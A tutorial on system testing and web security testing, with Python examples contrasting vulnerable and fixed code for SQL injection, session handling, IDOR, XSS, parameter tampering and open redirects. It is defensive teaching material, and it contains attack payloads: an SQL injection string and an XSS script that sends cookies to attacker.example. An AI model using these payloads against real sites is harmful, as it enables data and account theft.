What is System Testing?
System testing checks the complete, integrated system against the requirement specification, the identified risks, the business processes and the use cases. It is carried out from the user's point of view and is usually the final round of testing before delivery: it verifies that the software meets its specification and purpose, and it should find as many remaining defects as possible. It is a form of black-box testing.
System testing needs a test environment, a version-controlled build of the software, test cases and test data. The test environment should match the production environment as closely as possible, so that environment-specific failures are not missed. The user experience is assessed as part of the testing.
What is covered in System Testing
Both functional and non-functional requirements are covered; the non-functional tests include performance, compatibility and reliability. Incomplete or undocumented requirements are also exercised at this level. Tests are executed with different input data to check that the application returns the expected outputs.
Objectives of System Testing
- To test the complete integrated application, including external components, to check how the components interact with one another and with the system as a whole. This is also called end-to-end testing.
- To verify the system by supplying different inputs and checking for the expected outputs.
- To test the user’s experience with the application.
Different types of System testing
- Usability Testing
- Performance Testing
- Regression Testing
- Security Testing
- Recovery Testing
- Functional Testing
System Testing Process:
System Testing is performed in the following steps:
Test Environment Setup: A platform is built, with software and network configured, on which the test cases will be executed. The configuration follows the needs of the application under test. Getting the environment right is a precondition for useful results; an environment that differs from production wastes time and money on failures that do not reproduce and misses the ones that would.
Create Test Cases: Test cases are written at the system level to determine whether the system behaves as expected. They verify the functionality of the software and its use cases, and they include negative scenarios and boundary conditions.
Create Test Data: Test data is prepared for executing the test cases, covering both positive and negative scenarios. It is produced either manually (which takes a lot of time) or with an automated test data generation tool.
Execute Test Cases: Once the test cases and test data are designed, the test cases are executed in the prepared environment, in priority order.
Defect Reporting: Defects are identified as the test cases are executed. Any deviation from the expected result marks the test case as 'Fail' and a defect is raised. A test case is marked 'Blocked' if it cannot be executed because of an existing defect.
Regression Testing: This is carried out each time the code changes and a software update is about to be released, to confirm that existing functionality still works. Risk-based testing is also applied here: the most critical functionality is tested first.
Defect Fixing: A fix for the defect is delivered in a new software build for testing.
Retest: The fixed defects are verified by executing the corresponding failed test cases again. If a defect still reproduces during retesting it is marked as open and the cycle continues.
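The loop above (execute by priority, report Fail or Blocked, fix, retest) can be made concrete with a small harness. The following is an added example, not code from the original article: the system under test is a hypothetical login function in two builds, and the test cases, test data and the deliberate defect in build 1 are constructed for the demo.

```python
# Added example (not from the original article): a small execution loop that
# follows the steps above, run against a hypothetical login function in two
# builds. Test cases, test data and the "defect" in build 1 are constructed.
from dataclasses import dataclass
from typing import Any, Callable, Dict, List, Optional


@dataclass
class TestCase:
    name: str
    priority: int                     # 1 = most critical, executed first
    test_data: Dict[str, Any]         # input for the system under test
    expected: Any                     # expected output
    depends_on: Optional[str] = None  # marked Blocked while this case has an open defect


@dataclass
class Defect:
    case: str
    actual: Any
    expected: Any
    status: str = "open"              # open -> closed once the retest passes


class SystemTestRun:
    def __init__(self, sut: Callable[..., Any], cases: List[TestCase]):
        self.sut = sut
        self.cases = sorted(cases, key=lambda c: c.priority)   # risk-based ordering
        self.results: Dict[str, str] = {}
        self.defects: Dict[str, Defect] = {}

    def execute(self) -> Dict[str, str]:
        """Run each case; record Pass, Fail (defect raised) or Blocked."""
        for case in self.cases:
            dep = case.depends_on
            if dep and dep in self.defects and self.defects[dep].status == "open":
                self.results[case.name] = "Blocked"
                continue
            try:
                actual = self.sut(**case.test_data)
            except Exception as exc:          # a crash is a deviation, not a harness error
                actual = f"exception: {type(exc).__name__}"
            if actual == case.expected:
                self.results[case.name] = "Pass"
                if case.name in self.defects:
                    self.defects[case.name].status = "closed"
            else:
                self.results[case.name] = "Fail"
                self.defects.setdefault(case.name, Defect(case.name, actual, case.expected))
                self.defects[case.name].status = "open"   # stays open if a retest fails
        return dict(self.results)

    def retest(self, new_build: Callable[..., Any]) -> Dict[str, str]:
        """Re-run only the failed and blocked cases against the fixed build."""
        self.sut = new_build
        self.cases = [c for c in self.cases if self.results.get(c.name) != "Pass"]
        return self.execute()


ACCOUNTS = {"alice": "s3cret"}   # constructed sample data


def login_build1(user: str, password: str) -> str:
    # Defect: an empty password is accepted (missing boundary check).
    if user in ACCOUNTS and (password == "" or ACCOUNTS[user] == password):
        return "ok"
    return "denied"


def login_build2(user: str, password: str) -> str:
    if user in ACCOUNTS and password != "" and ACCOUNTS[user] == password:
        return "ok"
    return "denied"


CASES = [
    TestCase("valid_login", 1, {"user": "alice", "password": "s3cret"}, "ok"),
    TestCase("empty_password", 1, {"user": "alice", "password": ""}, "denied"),
    TestCase("unknown_user", 2, {"user": "mallory", "password": "x"}, "denied"),
    TestCase("post_login_flow", 3, {"user": "alice", "password": "s3cret"}, "ok",
             depends_on="empty_password"),
]


def run_cycle():
    """Execute against build 1, then retest the failed/blocked cases against build 2."""
    run = SystemTestRun(login_build1, CASES)
    first = run.execute()
    second = run.retest(login_build2)
    return first, second, {name: d.status for name, d in run.defects.items()}
```

In the first pass the empty-password case fails and raises a defect, and the case that depends on it is reported as Blocked rather than executed; after the fixed build arrives, only those two cases are re-run and the defect is closed.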
Advantages of System Testing
- It verifies the system against the business, functional and non-functional requirements of the end users.
- It helps get the maximum number of bugs fixed before acceptance testing.
- It helps in increasing the confidence level of the team in the product before it goes for release.
Disadvantages of System Testing
- System testing starts only after all the components are ready and integration testing is complete, so the cost of fixing the bugs it finds is higher.
- Bugs are harder to localize, because the entire system takes part in the test.
What is Security Testing?
Security Testing aims to uncover the threats, risks and vulnerabilities of a system (including malware) and to make sure data and resources are protected from possible intruders. It verifies the confidentiality, integrity, authentication, authorization and non-repudiation properties of the system.
The objective is to expose every loophole and weakness in the software that could lead to loss of data or service under attack.
Objectives of security testing
- To identify malware, threats and vulnerabilities
- To detect intrusions, such as denial-of-service attacks
- To check for open ports
- To check the integrity of files and to find weak passwords
Types of Security Testing
There are seven types of security testing, as below:
Vulnerability scanning: Performed with automated software that scans a system for known vulnerabilities (for example, outdated versions and missing patches).
Security scanning: Identifies network and system weaknesses and proposes remediation. It can be performed manually or with automated tools.
Penetration testing: Potential vulnerabilities are found by simulating the attacks a real attacker would attempt against the system.
Risk assessment: The security risks observed in the organization are analysed and categorized as Low, Medium or High, which guides the measures taken to reduce them.
Security auditing: An internal inspection of the application and operating system for security flaws, usually including a line-by-line review of the code.
Posture assessment: Combines security scanning, ethical hacking and risk assessment to give an overall picture of the organization's security posture.
Ethical hacking: An authorized attempt to break into the organization's systems in order to expose their flaws.
Focus of security testing
- Network security
- Supporting software such as the OS, APIs and databases
- Application code and browser security
- Server security
Security Testing Areas
SQL Injection
SQL injection is a web security vulnerability that lets an attacker interfere with the queries an application makes to its database. It allows the attacker to view data they are not normally able to see, including data belonging to other users or any other data the application itself can access. The attacker can also modify or delete that data, causing persistent changes to the application's content or behaviour, and in some cases escalate the attack to compromise the underlying server or other back-end infrastructure, or cause a denial of service.
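The following added example (not code from the original article) shows the same user lookup written with string concatenation and with a bound parameter, and the boolean probe a tester uses to tell the two apart. The table, rows and payloads are constructed for the demo; it uses an in-memory SQLite database so it runs offline.

```python
# Added example (not from the original article): the same user lookup written
# with string concatenation and with a bound parameter, plus the boolean probe
# a tester uses to detect the difference. Table and rows are constructed.
import sqlite3
from typing import Callable, List, Tuple

Row = Tuple[str, str]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "alice", "alice@example.com"),
        (2, "bob", "bob@example.com"),
    ])
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, name: str) -> List[Row]:
    # The input becomes part of the SQL text, so a quote in it changes the query.
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str) -> List[Row]:
    # The input is bound as a value; the driver never lets it alter the syntax.
    return conn.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


PAYLOAD = "' OR '1'='1"   # turns WHERE name = '' OR '1'='1' into "every row"


def boolean_probe(lookup: Callable[[sqlite3.Connection, str], List[Row]],
                  conn: sqlite3.Connection, name: str) -> bool:
    """Detection: if an always-true and an always-false suffix give different
    results, the suffix reached the SQL parser, i.e. the parameter is injectable."""
    true_case = lookup(conn, name + "' AND '1'='1")
    false_case = lookup(conn, name + "' AND '1'='2")
    return true_case != false_case


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable_normal": find_user_vulnerable(conn, "alice"),
        "vulnerable_payload": find_user_vulnerable(conn, PAYLOAD),
        "safe_payload": find_user_safe(conn, PAYLOAD),
        "vulnerable_detected": boolean_probe(find_user_vulnerable, conn, "alice"),
        "safe_detected": boolean_probe(find_user_safe, conn, "alice"),
    }
```

The payload makes the concatenated query return every row, while the parameterised query simply looks for a user whose name is literally `' OR '1'='1` and finds none. The boolean probe is the same idea a scanner uses: it never needs to see an error message, only a difference in behaviour between the true and false variants.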
Broken Authentication & Session Management
Broken Authentication is one of the OWASP Top 10 vulnerabilities. It covers the parts of a web application that let users create accounts and log in to them. When a user logs in, a session id is created and bound to that particular account; anyone who can obtain or forge that session id, or who can guess or steal the credentials, can act as the account.
If the application's authentication is built securely, well and good; if not, an attacker may use the following techniques.
- Credential stuffing: The attacker replays lists of username/password pairs, typically leaked from breaches of other sites or taken from default-credential lists, against the login form to find accounts that reuse them. Users are strongly advised to change default usernames and passwords, and not to reuse passwords across sites, to protect themselves from such attacks. The attacker can also generate custom password lists from whatever they already know about the target, using tools such as CRUNCH on Linux.
- Unhashed passwords: Hashing turns a clear-text password into a fixed-length digest, so a stored password cannot be recovered even by an attacker who obtains the database. A related weakness is transmitting the password in clear text: an attacker on the same network can intercept the login request and read the password the user submitted. Either way the user can lose the authorization and confidentiality of their account.
- Misconfigured session timeouts: A user logs out, but an attacker who has captured that user's cookie can still use it to access the account, because the session was not invalidated on the server. Such a loophole lets cookie tampering, session hijacking and other attacks be chained together into a single exploit (bug chaining). This class of bug is referred to as a misconfigured session timeout.
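The three weaknesses above come down to two server-side controls: how passwords are stored and compared, and how sessions are created, expired and destroyed. The following added example (not code from the original article) implements both with a controllable clock so the timeouts can be exercised without waiting. The timeout values, the PBKDF2 iteration count and the account data are assumptions chosen for the demo.

```python
# Added example (not from the original article): salted password hashing and a
# server-side session store with idle and absolute timeouts, so that a cookie
# captured by an attacker stops working after logout or inactivity. Timeout
# values and the PBKDF2 iteration count are assumptions for the demo.
import hashlib
import hmac
import os
import secrets
from typing import Callable, Dict, Optional

ITERATIONS = 600_000          # PBKDF2-HMAC-SHA256 work factor (OWASP's current figure)
IDLE_TIMEOUT = 15 * 60        # seconds without a request before the session dies
ABSOLUTE_TIMEOUT = 8 * 3600   # hard cap on session lifetime, regardless of activity


def hash_password(password: str) -> bytes:
    """Return salt || PBKDF2 digest; the clear-text password is never stored."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt + digest


def verify_password(password: str, stored: bytes) -> bool:
    salt, digest = stored[:16], stored[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)   # constant-time comparison


class SessionStore:
    """Sessions live on the server; the cookie only carries a random id."""

    def __init__(self, clock: Callable[[], float]):
        self.clock = clock
        self.sessions: Dict[str, dict] = {}

    def create(self, user: str) -> str:
        sid = secrets.token_urlsafe(32)      # 256 bits of entropy, not guessable
        now = self.clock()
        self.sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def resolve(self, sid: str) -> Optional[str]:
        """Map a cookie to a user, or None if unknown, idle too long, or too old."""
        s = self.sessions.get(sid)
        if s is None:
            return None
        now = self.clock()
        if now - s["created"] > ABSOLUTE_TIMEOUT or now - s["last_seen"] > IDLE_TIMEOUT:
            del self.sessions[sid]
            return None
        s["last_seen"] = now
        return s["user"]

    def logout(self, sid: str) -> None:
        # Deleting the server-side record is what makes a stolen cookie useless.
        self.sessions.pop(sid, None)


class FakeClock:
    """Controllable time source so the timeouts can be exercised without waiting."""

    def __init__(self, start: float = 1_700_000_000.0):
        self.now = start

    def __call__(self) -> float:
        return self.now

    def advance(self, seconds: float) -> None:
        self.now += seconds


def scenario() -> dict:
    clock = FakeClock()
    users = {"alice": hash_password("correct horse battery staple")}   # constructed account
    store = SessionStore(clock)
    out = {}
    out["wrong_password"] = verify_password("hunter2", users["alice"])
    out["right_password"] = verify_password("correct horse battery staple", users["alice"])
    sid = store.create("alice")
    out["fresh"] = store.resolve(sid)
    clock.advance(14 * 60)
    out["active_before_idle_limit"] = store.resolve(sid)   # activity resets the idle timer
    clock.advance(16 * 60)
    out["after_idle_limit"] = store.resolve(sid)
    sid2 = store.create("alice")
    store.logout(sid2)                                     # user logs out
    out["stolen_cookie_after_logout"] = store.resolve(sid2)
    sid3 = store.create("alice")
    for _ in range(40):                                    # keeps clicking every 14 min
        clock.advance(14 * 60)
        store.resolve(sid3)
    out["beyond_absolute_limit"] = store.resolve(sid3)
    return out
```

Note what the absolute timeout adds: a session that is used constantly never trips the idle timer, so without a hard cap a captured cookie would stay valid indefinitely. The clear-text-transmission problem from the list is not solved by anything here; that needs TLS on the login form.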
Insecure Direct Object Reference
Insecure direct object reference (IDOR) occurs when a web application uses a user-supplied identifier to access an internal object directly, without any further access control or authorization check. For example, an IDOR vulnerability exists if the transaction id in a URL can be changed on the client side to show the data of another user's transaction.
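The transaction example above, as an added example that is not code from the original article: the endpoint first keyed only on the id from the URL, then scoped to the logged-in user, together with the enumeration check a tester runs. The records, user names and id range are constructed for the demo.

```python
# Added example (not from the original article): the transaction endpoint from
# the paragraph above, first keyed only on the id from the URL, then scoped to
# the logged-in user, plus the enumeration check a tester would run. The
# records and user names are constructed for the demo.
from typing import Callable, Iterable, List

TRANSACTIONS = {
    1001: {"owner": "alice", "amount": 120.00},
    1002: {"owner": "bob", "amount": 75.50},
    1003: {"owner": "alice", "amount": 9.99},
}


class NotFound(Exception):
    pass


def get_transaction_vulnerable(current_user: str, txn_id: int) -> dict:
    # Authentication happened, but there is no authorization check on the object:
    # any logged-in user can read any transaction by editing the id in the URL.
    txn = TRANSACTIONS.get(txn_id)
    if txn is None:
        raise NotFound(txn_id)
    return txn


def get_transaction_safe(current_user: str, txn_id: int) -> dict:
    txn = TRANSACTIONS.get(txn_id)
    # Same error for "missing" and "not yours", so the response does not confirm
    # which ids exist.
    if txn is None or txn["owner"] != current_user:
        raise NotFound(txn_id)
    return txn


def idor_probe(endpoint: Callable[[str, int], dict], user: str, ids: Iterable[int]) -> List[int]:
    """Tester's check: walk a range of ids as `user` and list those returned
    for other owners."""
    leaked = []
    for tid in ids:
        try:
            txn = endpoint(user, tid)
        except NotFound:
            continue
        if txn["owner"] != user:
            leaked.append(tid)
    return leaked
```

In a real test the response will not label its owner; the equivalent check is to create two accounts, fetch an object with the second account's id while logged in as the first, and compare. Unguessable ids (UUIDs) make the probe slower but are not a substitute for the ownership check.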
Cross-Site Scripting (XSS)
Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications. XSS lets an attacker inject client-side scripts into web pages viewed by other users, and it can be used to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec up until 2007, and in 2017 XSS was still considered a major threat vector. Its effects range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the mitigations the site's owner has implemented.
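The following added example (not code from the original article) renders a search page that reflects the query three ways: unescaped, with only `<`, `>` and `&` escaped, and fully escaped. The second variant is a common half-fix that still lets a payload break out of an attribute value. The page markup and both payloads are constructed for the demo.

```python
# Added example (not from the original article): a search page that reflects
# the query, rendered three ways. Payloads are constructed for the demo.
import html


def search_page_vulnerable(query: str) -> str:
    # Raw input in both an element body and an attribute value.
    return f'<p>Results for {query}</p>\n<input name="q" value="{query}">'


def search_page_half_fixed(query: str) -> str:
    # Escapes < > & only; a payload built from quotes still breaks out of the attribute.
    partly = html.escape(query, quote=False)
    return f'<p>Results for {partly}</p>\n<input name="q" value="{partly}">'


def search_page_safe(query: str) -> str:
    # Escapes & < > " ' so the input can neither open a tag nor close the attribute.
    safe = html.escape(query, quote=True)
    return f'<p>Results for {safe}</p>\n<input name="q" value="{safe}">'


# Constructed payloads: one needs angle brackets, the other needs only a quote.
PAYLOAD_BODY = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
PAYLOAD_ATTR = '" autofocus onfocus="alert(document.domain)'


def script_tag_survives(rendered: str) -> bool:
    """Tester's check: did a literal <script> tag make it into the page?"""
    return "<script>" in rendered.lower()


def attribute_breakout(rendered: str) -> bool:
    """Tester's check: did the input close the value attribute and add its own?"""
    return ' onfocus="' in rendered
```

Escaping is context-dependent: the rule above is right for element bodies and quoted attribute values, but input placed inside a `<script>` block or a URL needs different encoding, which is why templating engines with automatic, context-aware escaping are preferred over hand-built strings.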
Security Misconfiguration
If a component is susceptible to attack because of an insecure configuration, that is a security misconfiguration. It is the same class of vulnerability whether the misconfiguration is in the web server, the database or the custom code. It is characterized as follows:
- Prevalence: As security misconfiguration is such a broad category, it is a very common vulnerability. A web application is built upon multiple layers and making a configuration mistake in one of them is quite likely.
- Potential impact: The impact varies and depends on the specific kind of misconfiguration. At worst, it could lead to a full takeover, which means stolen sensitive data and expensive recovery.
- Exploitability: In many cases this is one of the easiest vulnerabilities to exploit. For example, if a system administrator forgets to remove a default account with admin privileges, all an attacker has to do is look up the vendor's default credentials and log in.
Web Parameter Tampering
The web parameter tampering attack manipulates the parameters exchanged between client and server in order to modify application data such as user credentials and permissions, or the price and quantity of products. This information is usually stored in cookies, hidden form fields or URL query strings, and is used to extend the application's functionality and control flow.
The attack can be performed by a malicious user who wants to exploit the application for their own benefit, or by an attacker targeting a third party through a man-in-the-middle attack. In both cases, intercepting proxies such as WebScarab and Paros are typically used.
Success depends on errors in the application's integrity and logic validation, and exploitation can lead to further consequences including XSS, SQL injection, file inclusion and path disclosure.
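The price-and-quantity case above, as an added example that is not code from the original article: a checkout that trusts a hidden price field, the same checkout computing the price on the server, and an HMAC-signed hidden field for the cases where a value genuinely has to round-trip through the client. The catalog, the server key and the form contents are constructed for the demo.

```python
# Added example (not from the original article): a checkout that trusts a hidden
# price field, the same checkout computing price server-side, and an HMAC-signed
# hidden field for values that genuinely must round-trip through the client.
# The catalog, key and form contents are constructed for the demo.
import base64
import hashlib
import hmac
import json

CATALOG = {"sku-100": 49.99, "sku-200": 5.00}
SERVER_KEY = b"constructed-secret-key-rotate-in-production"   # hypothetical


def checkout_vulnerable(form: dict) -> float:
    # Price and quantity come straight from hidden fields the client controls.
    return round(float(form["price"]) * int(form["qty"]), 2)


def checkout_safe(form: dict) -> float:
    # Only the choice (sku, qty) is taken from the client; the price is the server's.
    sku = form["sku"]
    if sku not in CATALOG:
        raise ValueError("unknown sku")
    qty = int(form["qty"])
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    return round(CATALOG[sku] * qty, 2)


def is_rejected(form: dict) -> bool:
    """True when the hardened checkout refuses the form."""
    try:
        checkout_safe(form)
    except ValueError:
        return True
    return False


def sign_fields(fields: dict) -> str:
    """Serialize fields and append an HMAC so the server can detect client-side edits."""
    body = json.dumps(fields, sort_keys=True).encode()
    tag = hmac.new(SERVER_KEY, body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body).decode() + "." + base64.urlsafe_b64encode(tag).decode()


def verify_fields(token: str) -> dict:
    b64body, b64tag = token.split(".", 1)
    body = base64.urlsafe_b64decode(b64body)
    expected = hmac.new(SERVER_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, base64.urlsafe_b64decode(b64tag)):
        raise ValueError("hidden field was tampered with")
    return json.loads(body)


def is_tampered(token: str) -> bool:
    try:
        verify_fields(token)
    except ValueError:
        return True
    return False


def tamper(token: str, **changes) -> str:
    """What an attacker does in an intercepting proxy: edit the body, keep the old tag."""
    b64body, b64tag = token.split(".", 1)
    fields = json.loads(base64.urlsafe_b64decode(b64body))
    fields.update(changes)
    body = json.dumps(fields, sort_keys=True).encode()
    return base64.urlsafe_b64encode(body).decode() + "." + b64tag


# Constructed form submissions: honest, price edited in the proxy, negative quantity.
HONEST_FORM = {"sku": "sku-100", "qty": "3", "price": "49.99"}
TAMPERED_FORM = {"sku": "sku-100", "qty": "3", "price": "0.01"}
NEGATIVE_QTY = {"sku": "sku-100", "qty": "-3", "price": "49.99"}
```

The negative quantity shows why range checks belong with the price lookup: the trusting version happily computes a negative total, which in a real shop becomes a refund. Signing hidden fields stops silent edits, but it does not make the client a trustworthy place for a price; the server-side catalog lookup is still the primary fix.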
Unvalidated Redirects and Forwards
Unvalidated redirect vulnerabilities occur when an attacker can make a link on a trusted website send a user to an untrusted site. The vulnerability is also often called Open Redirect. OWASP ranked unvalidated redirects and forwards as uncommon in both its 2010 and 2013 Top Ten lists.
The potential danger of unvalidated redirects and forwards is usually considered moderate. The most common use is in phishing or other social-engineering attacks, which lowers the direct impact of the vulnerability. It also appears as one link in a chained attack that uses several vulnerabilities; such attacks are more advanced and therefore less common.
In most cases the vulnerability is very easy to exploit, which increases the likelihood of someone finding and abusing it. There have been cases that were much harder to exploit, but because the impact is limited, so is the time spent looking for the vulnerability, which means it is mainly the easier cases of unvalidated redirects and forwards that are discovered and exploited.
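The following added example (not code from the original article) validates a `next`-style redirect parameter against an allowlist and runs the probe targets a tester would try against it, including the scheme-relative, backslash, suffix-match and userinfo tricks that defeat naive checks. The allowlist, the parameter name and the probe targets are constructed for the demo.

```python
# Added example (not from the original article): validation of a `next`-style
# redirect parameter against an allowlist, together with the probe targets a
# tester would try. The allowlist and probes are constructed for the demo.
from typing import Dict
from urllib.parse import urlparse

ALLOWED_HOSTS = {"www.example.com", "example.com"}   # hypothetical trusted hosts
DEFAULT_LANDING = "/"


def is_safe_redirect(target: str) -> bool:
    if not target:
        return False
    # Backslashes and CR/LF: browsers may read '\' as '/', and CR/LF enables header injection.
    if any(c in target for c in "\\\r\n"):
        return False
    parsed = urlparse(target)
    if parsed.scheme and parsed.scheme not in ("http", "https"):
        return False                                       # javascript:, data:, ...
    if not parsed.scheme and not parsed.netloc:
        # Plain path: exactly one leading '/', so '//evil' (scheme-relative) is rejected.
        return target.startswith("/") and not target.startswith("//")
    # Absolute URL: exact host match, so 'www.example.com.evil.test' does not pass.
    return parsed.hostname in ALLOWED_HOSTS


def safe_redirect(target: str) -> str:
    """Return the target if it passes, else the site's own landing page."""
    return target if is_safe_redirect(target) else DEFAULT_LANDING


# Constructed probe list: target -> whether a correct validator should accept it.
PROBES = {
    "/account/settings": True,
    "https://www.example.com/account": True,
    "//evil.test/phish": False,                     # scheme-relative, resolves off-site
    "/\\evil.test": False,                          # backslash trick
    "https://www.example.com.evil.test/": False,    # suffix-matching trap
    "https://www.example.com@evil.test/": False,    # userinfo trick
    "javascript:alert(1)": False,
    "http:evil.test": False,                        # scheme without '//'
    "/login\r\nSet-Cookie: x=1": False,             # header injection attempt
    "": False,
}


def run_probes() -> Dict[str, bool]:
    return {t: is_safe_redirect(t) for t in PROBES}
```

Two points the probe list makes: host checks must be exact (or suffix-matched on a leading dot), never `endswith("example.com")`, and a path check must reject a second leading slash, because `//evil.test` is a valid URL that the browser resolves to another origin. The simplest alternative, when it fits, is to not accept a URL at all and redirect by a server-side key instead.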